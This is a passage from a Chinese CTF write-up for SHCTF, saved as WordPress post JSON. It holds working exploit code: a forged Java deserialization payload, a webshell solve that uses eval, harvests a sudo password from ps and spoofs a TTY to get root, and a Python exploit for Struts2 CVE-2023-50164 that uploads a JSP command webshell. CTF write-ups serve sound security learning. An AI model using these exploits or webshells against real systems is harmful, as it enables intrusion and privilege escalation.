    \u670d\u52a1\u7aef\u6ca1\u6709\u5bf9\u53cd\u5e8f\u5217\u5316\u7c7b\u8fdb\u884c\u9ed1\u767d\u540d\u5355\u8fc7\u6ee4\u3002\nNote \u7c7b\u5b9e\u73b0\u4e86 Serializable \u63a5\u53e3\uff0c\u4e14\u5305\u542b filePath \u5b57\u6bb5\u3002\n\u6211\u4eec\u6784\u9020\u4e00\u4e2a\u6076\u610f\u7684 Note \u5bf9\u8c61\uff0c\u5c06 filePath \u8bbe\u7f6e\u4e3a \/flag.txt\u3002\n\u5c06\u8be5\u5bf9\u8c61\u5e8f\u5217\u5316\u4e3a\u4e8c\u8fdb\u5236\u6d41\uff0c\u901a\u8fc7 POST \u53d1\u9001\u7ed9\u670d\u52a1\u7aef\u3002\n\u670d\u52a1\u7aef\u53cd\u5e8f\u5217\u5316\u540e\u4f1a\u89e6\u53d1 readFile\uff0c\u5c06 Flag \u6253\u5370\u51fa\u6765\u3002<\/code><\/pre>\n\n\n\n
    exp.py<\/p>\n\n\n\n
    import requests\nimport struct\n\nurl = \"http:\/\/challenge.shc.tf:32063\/upload\"\n\ndef pwn():\n    paths = [\"\/flag.txt\", \"\/flag\"]\n\n    header = bytes.fromhex(\"aced0005\")\n    class_desc = bytes.fromhex(\"737200044e6f74650000000000000001020003\")\n    fields = bytes.fromhex(\"4c000866696c65506174687400124c6a6176612f6c616e672f537472696e673b4c00076d65737361676571007e00014c00057469746c6571007e0001\")\n    footer = bytes.fromhex(\"7870\")\n\n    for path in paths:\n        try:\n            b_path = path.encode()\n            val_path = b'x74' + struct.pack('>H', len(b_path)) + b_path\n\n            b_dummy = b'x'\n            val_dummy = b'x74' + struct.pack('>H', len(b_dummy)) + b_dummy\n\n            payload = header + class_desc + fields + footer + val_path + val_dummy + val_dummy\n\n            res = requests.post(url, data=payload, timeout=3)\n\n            if \"SHCTF\" in res.text:\n                print(res.text.strip())\n                break\n        except:\n            pass\n\nif __name__ == \"__main__\":\n    pwn()<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    SHCTF{b88fe63f-4985-4dfe-bcff-bf7e4a93c210}<\/code><\/pre>\n\n\n\n
    sudoooo0<\/strong><\/h3>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u7f51\u9875\u6ca1\u6709\u4e1c\u897f\u65e0\u5f71\u626b\u63cf\u76ee\u5f55<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u53d1\u73b0webshell.php<\/p>\n\n\n\n
    \u8bbf\u95ee\u540e\u9875\u9762\u7a7a\u767d<\/p>\n\n\n\n
    \u901a\u8fc7 Fuzz \u6216\u731c\u6d4b\uff0c\u786e\u5b9a\u53c2\u6570\u540d\u4e3a cmd<\/code>\u3002\u76f4\u63a5\u4f20\u5165\u7cfb\u7edf\u547d\u4ee4\uff08\u5982 id<\/code>\uff09\u62a5\u9519 Parse error<\/code>\uff0c\u8bf4\u660e\u540e\u7aef\u903b\u8f91\u662f eval($_GET['cmd'])<\/code>\uff0c\u9700\u8981\u4f20\u5165 PHP \u4ee3\u7801\u3002<\/p>\n\n\n\n
    curl \"http:\/\/challenge.shc.tf:32004\/webshell.php?cmd=id\"<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    Payload \u6784\u9020\uff1a<\/strong> \u4f7f\u7528 PHP \u7684 system()<\/code> \u51fd\u6570\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u3002<\/p>\n\n\n\n
    http://challenge.shc.tf:32004\/webshell.php?cmd=system('id');<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u9898\u76ee\u540d\u6697\u793a\u4e0e Sudo \u6709\u5173\u3002\u5c1d\u8bd5\u68c0\u67e5 Sudo \u6743\u9650\uff1a<\/p>\n\n\n\n
    http://challenge.shc.tf:32004\/webshell.php?cmd=system(%27sudo%20-l%202%3E&1%27);<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    Webshell \u7684 system()<\/code> \u51fd\u6570\u662f\u5728\u975e\u4ea4\u4e92\u5f0f\u73af\u5883\u4e0b\u8fd0\u884c\u7684\uff0c\u6ca1\u6709\u5206\u914d TTY\uff08\u7ec8\u7aef\uff09\uff0c\u800c Sudo \u914d\u7f6e\u8981\u6c42\u5fc5\u987b\u6709 TTY\u3002\u6211\u4eec\u9700\u8981\u60f3\u529e\u6cd5\u7ed5\u8fc7\u8fd9\u4e2a\u9650\u5236\u3002<\/p>\n\n\n\n
    \u67e5\u770b\u76ee\u5f55<\/p>\n\n\n\n
    curl \"http:\/\/challenge.shc.tf:32004\/webshell.php?cmd=system('ls%20-la%20\/');\"<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u770b\u4e0d\u4e86flag<\/p>\n\n\n\n
    \u67e5\u770b\u7cfb\u7edf\u542f\u52a8\u811a\u672c\uff0c\u5bfb\u627e\u73af\u5883\u914d\u7f6e\u7ebf\u7d22\uff1a<\/p>\n\n\n\n
     curl \"http:\/\/challenge.shc.tf:32004\/webshell.php?cmd=system('cat%20\/docker-entrypoint.sh');\"<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u53d1\u73b0\u5173\u952e\u903b\u8f91<\/strong>\uff1a \u811a\u672c\u4e2d\u751f\u6210\u4e86\u4e00\u4e2a\u968f\u673a\u5bc6\u7801 NEWPASS<\/code>\uff0c\u7136\u540e\u542f\u52a8\u4e86\u4e00\u4e2a\u540e\u53f0\u8fdb\u7a0b\uff1a<\/p>\n\n\n\n
    su - ctf -c \"nohup script ... 'bash -li -c \"echo ${NEWPASS} | sudo -S -v ...\"' ...\"<\/code><\/pre>\n\n\n\n
    \u6f0f\u6d1e\u70b9<\/strong>\uff1a \u5bc6\u7801\u88ab\u76f4\u63a5\u62fc\u63a5\u5230\u4e86\u547d\u4ee4\u884c\u53c2\u6570\u4e2d\u3002\u5728 Linux \u4e2d\uff0c\u4efb\u4f55\u7528\u6237\u90fd\u53ef\u4ee5\u901a\u8fc7 ps<\/code> \u547d\u4ee4\u67e5\u770b\u6240\u6709\u8fdb\u7a0b\u7684\u5b8c\u6574\u542f\u52a8\u547d\u4ee4\uff0c\u4ece\u800c\u7a83\u53d6\u5bc6\u7801\u3002<\/p>\n\n\n\n
    \u83b7\u53d6 Sudo \u5bc6\u7801<\/p>\n\n\n\n
    \u6267\u884c ps -ef<\/code> \u5217\u51fa\u6240\u6709\u8fdb\u7a0b\uff1a<\/p>\n\n\n\n
    curl \"http:\/\/challenge.shc.tf:32004\/webshell.php?cmd=system('ps%20-ef');\"<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    script -q -f -c bash -li -c \"echo qr4T | sudo -S -v >\/dev\/null 2>&1;<\/code><\/pre>\n\n\n\n
    \u83b7\u5f97\u5bc6\u7801qr4T<\/p>\n\n\n\n
    \u4f2a\u9020 TTY \u5e76\u83b7\u53d6 Flag<\/p>\n\n\n\n
    \u73b0\u5728\u6211\u4eec\u6709\u4e86\u5bc6\u7801 qr4T<\/code>\uff0c\u4f46\u4ecd\u7136\u9762\u4e34 must have a tty<\/code> \u7684\u62a5\u9519\u3002<\/p>\n\n\n\n
    \u89e3\u51b3\u65b9\u6848<\/strong>\uff1a \u5229\u7528 script<\/code> \u547d\u4ee4\u3002script<\/code> \u7528\u4e8e\u5f55\u5236\u7ec8\u7aef\u4f1a\u8bdd\uff0c\u5b83\u5728\u6267\u884c\u65f6\u4f1a\u5206\u914d\u4e00\u4e2a\u4f2a\u7ec8\u7aef\uff08PTY\uff09\u3002\u6211\u4eec\u53ef\u4ee5\u7528\u5b83\u6765\u5305\u88f9 sudo<\/code> \u547d\u4ee4\uff0c\u9a97\u8fc7 Sudo \u7684\u68c0\u67e5\u3002<\/p>\n\n\n\n
    \u6700\u7ec8 Payload \u6784\u9020\uff1a\n\u4f7f\u7528 script -q -c \"...\" \/dev\/null \u4f2a\u9020 TTY\u3002\n\u5185\u90e8\u4f7f\u7528 echo \u5bc6\u7801 | sudo -S \u547d\u4ee4 \u8fdb\u884c\u975e\u4ea4\u4e92\u5f0f\u63d0\u6743\u3002<\/code><\/pre>\n\n\n\n
    curl \"http:\/\/challenge.shc.tf:32004\/webshell.php?cmd=system('script%20-q%20-c%20%22echo%20qr4T%20|%20sudo%20-S%20cat%20\/flag%22%20\/dev\/null');\"<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    SHCTF{$Ud#_T0keN_Inj3CT1#n_pwnEd_20ZS}<\/code><\/pre>\n\n\n\n
    BabyJavaUpload<\/strong><\/h3>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u6f0f\u6d1e\u70b9\u5206\u6790\n\u672c\u9898\u7684\u6f0f\u6d1e\u70b9\u5728\u4e8e Apache Struts2 \u7684\u6587\u4ef6\u4e0a\u4f20\u903b\u8f91\u7f3a\u9677\uff0c\u5373 CVE-2023-50164 (S2-066)\u3002\u8be5\u6f0f\u6d1e\u5141\u8bb8\u653b\u51fb\u8005\u901a\u8fc7\u5728 multipart\/form-data \u8bf7\u6c42\u4e2d\u64cd\u7eb5\u53c2\u6570\uff08\u5982 myfileFileName\uff09\uff0c\u7ed5\u8fc7\u8def\u5f84\u904d\u5386\u9650\u5236\u3002\u7531\u4e8e Struts2 \u5728\u5904\u7406\u4e0a\u4f20\u53c2\u6570\u65f6\u5b58\u5728\u4f18\u5148\u7ea7\u6216\u5927\u5c0f\u5199\u5904\u7406\u4e0d\u5f53\u7684\u95ee\u9898\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u9996\u5b57\u6bcd\u5927\u5199\u7684\u53c2\u6570\u540d\uff08\u5982 Myfile\uff09\u914d\u5408\u8def\u5f84\u7a7f\u8d8a\u53c2\u6570\uff0c\u5c06\u6076\u610f JSP \u6587\u4ef6\uff08Webshell\uff09\u5199\u5165\u670d\u52a1\u5668\u7684 Web \u6839\u76ee\u5f55\uff08\u5982 Tomcat \u7684 webapps\/ROOT\/\uff09\u3002<\/code><\/pre>\n\n\n\n
    \u89e3\u9898\u6b65\u9aa4<\/p>\n\n\n\n
    \u6846\u67b6\u8bc6\u522b\uff1a\u901a\u8fc7 upload.action \u540e\u7f00\u4ee5\u53ca\u9898\u76ee\u63cf\u8ff0\u4e2d\u5bf9 Java \u5b89\u5168\u6027\u7684\u6697\u793a\uff0c\u786e\u8ba4\u540e\u7aef\u4f7f\u7528 Struts2 \u6846\u67b6\u3002\n\u73af\u5883\u786e\u8ba4\uff1a\u54cd\u5e94\u5934\u663e\u793a\u540e\u7aef\u4e3a Apache Tomcat\/8.5.81\uff0c\u7531\u4e8e\u9898\u76ee\u63d0\u793a flag \u5728\u6839\u76ee\u5f55\uff0c\u76ee\u6807\u662f\u5229\u7528\u8def\u5f84\u7a7f\u8d8a\u5c06 Webshell \u5199\u5165 webapps\/ROOT\/\u3002\n\u6f0f\u6d1e\u5229\u7528\uff1a\u6784\u9020\u7279\u6b8a\u7684 multipart \u8bf7\u6c42\uff0c\u5305\u542b\u6587\u4ef6\u5b57\u6bb5 Myfile \u548c\u8def\u5f84\u8986\u76d6\u5b57\u6bb5 myfileFileName\u3002\n\u83b7\u53d6 Flag\uff1a\u8bbf\u95ee\u4e0a\u4f20\u6210\u529f\u7684 backdoor.jsp\uff0c\u901a\u8fc7\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u8bfb\u53d6\u6839\u76ee\u5f55\u4e0b\u7684 flag \u6587\u4ef6\u3002<\/code><\/pre>\n\n\n\n
    exp.py<\/p>\n\n\n\n
    import requests\nfrom requests_toolbelt import MultipartEncoder\n\nurl = \"http:\/\/challenge.shc.tf:30876\/upload.action\"\nshell_url = \"http:\/\/challenge.shc.tf:30876\/backdoor.jsp\"\n\njsp_code = b'''<%\n    Process p = Runtime.getRuntime().exec(new String[]{\"\/bin\/sh\", \"-c\", request.getParameter(\"cmd\")});\n    java.io.InputStream in = p.getInputStream();\n    int c; while ((c = in.read()) != -1) out.write(c);\n%>'''\n\nm = MultipartEncoder(\n    fields={\n        \"Myfile\": (\"test.txt\", jsp_code, \"text\/plain\"),\n        \"myfileFileName\": \"..\/..\/webapps\/ROOT\/backdoor.jsp\"\n    }\n)\n\nrequests.post(url, data=m, headers={\"Content-Type\": m.content_type}, proxies={\"http\": None})\nres = requests.get(shell_url, params={\"cmd\": \"cat \/flag*\"}, proxies={\"http\": None})\nprint(res.text.strip())<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    SHCTF{001fadfa-cff6-45c5-81e2-48f55aa95e2f}<\/code><\/pre>\n\n\n\n
    osint(0)<\/h1>\n\n\n\n
    \u6211\u8bf4\u771f\u7684\u6211\u7684\u4e16\u754c\u627e\u5750\u6807\uff0c\u51fa\u7684\u9898\u76ee\u4e0d\u597d\uff0c\u53ea\u662f\u5efa\u8bae\uff0c\u6709\u597d\u591a\u4e0d\u73a9\u6211\u7684\u4e16\u754c\uff0c\u6240\u4ee5\u57fa\u672c\u76f4\u63a5\u5c310\u6ca1\u6709\u89e3\uff0c\u5e0c\u671b\u4e0b\u6b21\u4e0d\u8981\u6709\u8fd9\u4e2a\u9898\u4e86<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u603b\u7ed3<\/h1>\n\n\n\n
    \u9898\u76ee\u96be\u5ea6\u9002\u4e2d \u8fd8\u884c\uff0c\u540e\u9762\u8fd8\u662f\u6ca1\u6709\u65f6\u95f4\u505a\u4e86 \u4e3b\u8981\u662f\u4e34\u8fd1\u6625\u8282\uff0c\u540e\u9762\u6ca1\u6709\u65f6\u95f4\u505a<\/p>\n","protected":false},"excerpt":{"rendered":"
    \u524d\u8a00 \u8fd8\u884c\u5c31\u662f\u5728\u5feb\u6625\u8282\u5907\u5e74\u8d27\u7684\u65f6\u95f4\u6bb5\uff0c\u4e00\u76f4\u6709\u4e8b\uff0c\u6ca1\u6709\u4ec0\u4e48\u65f6\u95f4\u5199\u548c\u505a\uff0cwp\u8fd8\u8981\u52a0\u73ed\u5199\uff0c\u7d2f\u6b7b\u4e86 osint \u5168\u662f\u6211 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,25],"tags":[],"class_list":["post-2748","post","type-post","status-publish","format-standard","hentry","category-ctf","category-shctf"],"_links":{"self":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/2748","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2748"}],"version-history":[{"count":3,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/2748\/revisions"}],"predecessor-version":[{"id":2996,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/2748\/revisions\/2996"}],"wp:attachment":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2748"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2748"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2748"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}